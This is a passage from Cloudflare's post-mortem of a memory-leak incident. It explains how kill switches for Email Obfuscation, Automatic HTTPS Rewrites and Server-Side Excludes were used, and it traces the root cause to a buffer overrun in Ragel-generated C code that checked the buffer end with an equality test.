It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself.
Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding feature flag, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks.
Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing.
We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses.
    
      Root cause of the bug
      
        
      
    
    The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error.
            /* generated code */
if ( ++p == pe )
    goto _test_eof;
            The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using >= instead of == jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly.
The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun.
Here’s a piece of Ragel code used to consume an attribute in an HTML